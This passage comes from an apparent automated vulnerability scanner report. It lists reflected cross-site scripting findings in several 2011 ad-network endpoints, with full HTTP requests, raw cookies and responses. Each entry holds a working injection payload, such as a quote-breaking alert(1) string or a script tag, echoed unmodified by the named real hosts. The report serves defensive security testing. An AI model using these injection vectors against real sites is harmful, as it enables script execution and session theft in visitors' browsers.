Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwu43i6gQQu43i6gQYAA..; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByG2Z*cOV44Vx47:P>wP?'k!>#Sc#Q0wG>ehEXh'cvTtWpuD`i3_xlS]=e@@#WVG93ZY4u96P7D+aP!tax]Ar:exw7qy2kctYf4]Ks*mLs/?cJ7s(5OpJ'J7l*!I)(S)H583(]MIRAZ.PYa$q`Mb<ZX40>XBzN(=`_6FU$bYGILL/'(=(W<F:LrcFt?s[%fU+fe*5I?!GvM7n6@%lW(%WUoR-JyuKI'#zNHys<uIyR(:fd6Y7cZzXG_g2R('%z.c^77c]N5y<l>wCs#e>2oQfSw+%_CYI(:/izth1aXbqK1[tuKPR4bYj[FoBl$ppax7-77r+lbUAtCfImKFJ%XF>-'obJe[kE/hrvX_i-NS!Z^XYKTdg3N.o=jLz2F#GnDkd5CEhYRZziD/hEFNIV.#qCT+[?Ma%T#sgFG5wZPK)D/#B@my`MYsXjEzp[GM`0nCH]Kn(1^I)hR=qwoGiL.o-aq[v$1pM_K)OY`hS(U-]vHyf.A%5w'0qV/w->VOE>Cl5w#x#=kVw`^]^cnpv51L-6hoUul_@fF]RP:N!Dh59jMafXQk6mTuYRkKZB2ck*z-$('vlN3`A5Ts]vo]l[1jXj`I]xd74F7(r_OC4Q+$le=sPI>6sJhum(aiwMrbP*=Qx-jQMmxf[iwdL!U`%4LEG9y#H%JOl9]SsNW; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:34:51 GMT
Content-Length: 1317

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/711-118167-2042-2/4?mpt=1297647291&Perf_Tracker_1=0000777384&Perf_Tracker_2=000095147015a6a'-alert(1)-'5f2f4eb2edd&Perf_Tracker_3=1183&imp_id=5777077306698984031&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=180x150&adid=307892&mpvc= http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAA
...[SNIP]...

1.173. http://ebay.adnxs.com/ttj [pt3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9484d'-alert(1)-'49a4b8e6987 was submitted in the pt3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384&pt2=0000951470&pt3=11839484d'-alert(1)-'49a4b8e6987&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwxI3i6gQQxI3i6gQYAA..; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByG2Z*cOV44Vx47:P?+T?'k!>#Sc#R/_.pahEXh'cvTtWpuD_=4!=uT]=e@@#WVG93ZY4u96P7D+aP!tax]Ju:exw7qy2_^tYf4]Ks*mLs/?cJ7s(5OkFNF7RzUee7ff.clx*lGIRAg2$MyRF`BXtGX40>XC?a++^.Da3$bYGIIrIg(1hE@#:LqW#t?t5/fU+fe*QeH%EDs_I6?4YY(%]+YR<+z_`zKlZNe9rt`oUb>:fau[7cZIHG_g3=uY$Vn8QGa7bZ>98l0>?G#e>2oQfSw+%_CYI)SH>(th6H*wZ'jlrpS?-D3oG7m:6E3i1C-V6/Lu8a0)9ic+!svi3SbOWR@K@qm[Y3<Uao60GsPo#VSI>rzH'*wtSE@w9]P7GnDkd5ChirRZy]z/hEEdIV.#pX.l[.M`Y:xt*dhBwZTyVD0dqymyiGVt9JX%p[GOv?BCDIpgDKcnMq2Vk]4p.su4l[kAU#HhCFWY$[II-1ah0=>'sPu%'u!9jpej-X1ql[c]Hv%we*u(w)z!.NfM*1TN]R)fpBW12a=jT2RR>.VPit6J8Uu/JCap<-4=h-@n$`y6'#!.^ft^[Tgza()x1[6kr)xY]xd8aEAv6IWbIdu$_*8GP`NxDJhlg'LQ?5sbP>IKx-jQMmws[qwdPTV`%0/vB-p=h%JOl9]V%rn; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:35:00 GMT
Content-Length: 1317

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/711-118167-2042-2/4?mpt=1297647300&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=11839484d'-alert(1)-'49a4b8e6987&imp_id=9182123578777281571&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=180x150&adid=307892&mpvc= http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAACMkwvS-dG1_BWHfHSmrE
...[SNIP]...

1.174. http://ev.ib-ibi.com/pibiview.js [xid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ev.ib-ibi.com
Path:   /pibiview.js

Issue detail

The value of the xid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9831'%3balert(1)//11d8f3efe69 was submitted in the xid parameter. This input was echoed as d9831';alert(1)//11d8f3efe69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pibiview.js?go=2208&pid=12&xid=f978e9b0-271c-47b8-9a97-caba692f0bb2d9831'%3balert(1)//11d8f3efe69 HTTP/1.1
Host: ev.ib-ibi.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 02:28:46 GMT
Content-Length: 791

IB_PartnerViewSetupScript=new function(){this.LoadViewScript=function(){try{var s=window.document.createElement("script");s.setAttribute("type", "text/javascript");s.setAttribute("src", "https://ev.ib
...[SNIP]...
ld(s);}catch (Error){}};
this.ProcessRequest = function(){this.LoadViewScript();};}
function IBPartner(){}
IBPartner.prototype.Go='2208';IBPartner.prototype.Xid='f978e9b0-271c-47b8-9a97-caba692f0bb2d9831';alert(1)//11d8f3efe69';IBPartner.prototype.Ida='';IBPartner.prototype.Pid='12'; IBPartner.prototype.Id1='';IBPartner.Go='2208';IBPartner.Xid='f978e9b0-271c-47b8-9a97-caba692f0bb2d9831';alert(1)//11d8f3efe69';IBPartner.Ida=
...[SNIP]...

1.175. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 5f074<script>alert(1)</script>ccdbedd4d61 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.haaretz.com%2Fnews%2Fdiplomacy-defense%2Freport-palestinian-cabinet-to-resign-in-wake-of-mideast-turmoil-1.343218&uid=YpffvxtzOKuYhLCm_405295695f074<script>alert(1)</script>ccdbedd4d61&xy=0%2C0&wh=300%2C250&vchannel=1056349&cid=EPCV0111A&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CAF399AA1BA194759D134605EFF6C6D9; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 14 Feb 2011 01:37:30 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("YpffvxtzOKuYhLCm_405295695f074<script>alert(1)</script>ccdbedd4d61");

1.176. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6857d'-alert(1)-'6832ddace00 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=rkfhehSuCkCuR-F6FK4KQAAAAGBmZgJArkfhehSuCkCuR-F6FK4KQAqCdmWvEgIiBWHfHSmrEEKBi1hNAAAAAAQRAQC1AAAANQEAAAIAAACDaAIA0WMAAAEAAABVU0QAVVNEAKAAWALcANADyAUBAgUCAAIAAAAA4x3afwAAAAA.&tt_code=drudgereport.com&udj=uf%28%27a%27%2C+537%2C+1297648513%29%3Buf%28%27c%27%2C+5740%2C+1297648513%29%3Buf%28%27r%27%2C+157827%2C+1297648513%29%3Bppv%28783%2C+%272450541691773813258%27%2C+1297648513%2C+1298944513%2C+5740%2C+25553%29%3B&cnd=!6BUqYQjsLBCD0QkYACDRxwEo0AcxmZmZcRSuCkBCEwgAEAAYACABKP7__________wFIAFAAWNwBYABotQI.6857d'-alert(1)-'6832ddace00&referrer=http://www.drudgereport.com/&pp=TViLgQAFq_IK5TjPs25hd06kLUEGn6rqtMqyaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBsgOVgYtYTfLXFs_xlAf3wrmbC-_675oCl5_7xBrXgo-PDAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0wNTAyNzE3MDkxMjc5MzczsgEUd3d3LmRydWRnZXJlcG9ydC5jb226AQoxNjB4NjAwX2FzyAEJ2gEcaHR0cDovL3d3dy5kcnVkZ2VyZXBvcnQuY29tL5gCuBfAAgTIAquCpQ6oAwHoA_sD6AOMA-gDmQP1AwAAAsT1AyAAAAA%26num%3D1%26sig%3DAGiWqtw_eL9DBqAZ0PN7cEKlsXl5DladFA%26client%3Dca-pub-0502717091279373%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=600&slotname=6309509649&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297648551504&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297648551509&frm=1&adk=3377972691&ga_vid=1250234459.1297648552&ga_sid=1297648552&ga_hid=1841793208&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2928058547&eid=33895298&fu=0&ifi=1&dtd=8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIsHAQChgBIAEoATD_jeLqBAoRCI54EAoYAiACKAIwoY7i6gQKEgj8iAEQChgBIAEoATDcjeLqBAoSCL-PARAKGAEgASgBMIuN4uoEEKGO4uoEGAQ.; acb717022=5_[r^208WMvBlUw20/dRC(+RZ?enc=q6qqqqqqCkAAAAAAAAAIQAAAAAAAAAhAFo_mI4TiCkDDEDl9Pd8NQOEABvpoyVx2BWHfHSmrEEIhh1hNAAAAAMs4AwA3AQAANQEAAAIAAADifwEAploAAAEAAABVU0QAVVNEACwB-gBYDgAA0wgBAgUCAAUAAAAACRsvXwAAAAA.&tt_code=cm.dailymail&udj=uf%28%27a%27%2C+3338%2C+1297647393%29%3Buf%28%27c%27%2C+15498%2C+1297647393%29%3Buf%28%27r%27%2C+98274%2C+1297647393%29%3Bppv%282932%2C+%278528913247041356001%27%2C+1297647393%2C+1297733793%2C+15498%2C+23206%29%3B&cnd=!bhaubAiKeRDi_wUYACCmtQEoADGprN67Pd8NQEITCAAQABgAIAEo_v__________AUgAUABY2BxgAGi1Ag..; sess=1; uuid2=4760492999213801733; anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:55:52 GMT
Content-Length: 1077

document.write('<a href="http://ib.adnxs.com/click/AAAAAAAACEAAAAAAAAAIQAAAAGBmZgJArkfhehSuCkCuR-F6FK4KQAqCdmWvEgIiBWHfHSmrEEKBi1hNAAAAAAQRAQC1AAAANQEAAAIAAACDaAIA0WMAAAEAAABVU0QAVVNEAKAAWALcANADyAUBAgUCAAIAAAAAuxe_kgAAAAA./cnd=!6BUqYQjsLBCD0QkYACDRxwEo0AcxmZmZcRSuCkBCEwgAEAAYACABKP7__________wFIAFAAWNwBYABotQI.6857d'-alert(1)-'6832ddace00/referrer=http%3A%2F%2Fwww.drudgereport.com%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBsgOVgYtYTfLXFs_xlAf3wrmbC-_675oCl5_7xBrXgo-PDAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIB
...[SNIP]...

1.177. http://ib.adnxs.com/ab [custom_macro parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the custom_macro request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e306'%3balert(1)//5bb5c06a74 was submitted in the custom_macro parameter. This input was echoed as 7e306';alert(1)//5bb5c06a74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=ZmZmZmZmAEBaIEHxY8z8PwAAAKCZmQFAWiBB8WPM_D9mZmZmZmYAQHC0hOKKmnRfBWHfHSmrEELBj1hNAAAAAK-aAwBlAQAAZAEAAAIAAAALtgIAPWQAAAEAAABVU0QAVVNEAKAAWAJXG-MECAkBAgUCAAIAAAAATCCnlAAAAAA.&tt_code=drudgereport.com&udj=uf%28%27a%27%2C+10005%2C+1297649601%29%3Buf%28%27c%27%2C+49470%2C+1297649601%29%3Buf%28%27r%27%2C+177675%2C+1297649601%29%3Bppv%289163%2C+%276878292452198102128%27%2C+1297649601%2C+1297822401%2C+49470%2C+25661%29%3B&cnd=!9BV8Wwi-ggMQi-wKGAAgvcgBKOMJMWZmZmZmZgBAQhMIABAAGAAgASj-__________8BSABQAFjXNmAAaOQC&referrer=http://www.drudgereport.com/&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5E7BSW%5ECP_ID%5E49470%5ESEG_CODES%5E7BSW-17e306'%3balert(1)//5bb5c06a74&pp=AAABLiHxjW2aHsAUrhXeXy7HnjQEzy6mEJhGsA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0K-0oEi9BqslYpw4GThC965ufnbUW7BwJm5Gu783YwBw91KDpWzUohmJbpm2okwppa7yYI0lOlyW9fubMZ7jaRy0-IPoOVpmsh49NdEahLnmrg4ToC-HK_DZHW7Ae8cfPqIKT3MAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIsHAQChgBIAEoATD_jeLqBAoRCI54EAoYAiACKAIwoY7i6gQKEQjMeBAKGAEgASgBMIue4uoEChII_IgBEAoYASABKAEw3I3i6gQKEgi_jwEQChgBIAEoATCLjeLqBBCLnuLqBBgF; sess=1; uuid2=4760492999213801733; anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
